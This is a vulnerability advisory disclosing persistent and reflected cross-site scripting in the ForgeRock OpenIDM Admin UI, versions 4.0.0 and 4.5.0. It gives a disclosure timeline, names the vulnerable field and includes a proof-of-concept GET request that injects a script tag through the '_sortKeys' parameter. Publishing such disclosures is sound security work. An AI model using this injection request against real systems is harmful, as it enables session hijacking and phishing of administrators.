ForgeRock persistent and reflected Cross Site Scripting (XSS)

Cross Site Scripting (XSS)

Product OpenIDM
Affected versions 4.0.0, 4.5.0
Fixed versions
Component Admin UI
Severity Medium

Description:

OpenIDM is vulnerable to both persistent and reflected cross-site scripting (XSS) attacks within the Admin UI, which could lead to session hijacking or phishing.

Report Timeline
************************
17-Jan-2017- Reported
17-Jan-2017- Vendor Response
28 -March-2017- Vendor Fixed
07-April-2017- Public disclosed

POC:

XSS persistent

Object management option >> field “Managed Object Name”

XSS reflected 

User  management option >> parameter “ _sortKeys”

GET /openidm/managed/user/86cdebd5-d685-4090-bc5c-3d8ea79fe3aa/authzRoles?page=1&_pageSize=50&sort_by=_id&_sortKeys=_id<script>alert(“Xss”);</script>&_queryFilter=true&_fields=&_pagedResultsOffset=0&_totalPagedResultsPolicy=ESTIMATE

 

Workaround:

No workaround available.

Resolution:

Update/upgrade to a fixed version or deploy the relevant patch bundle.

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

*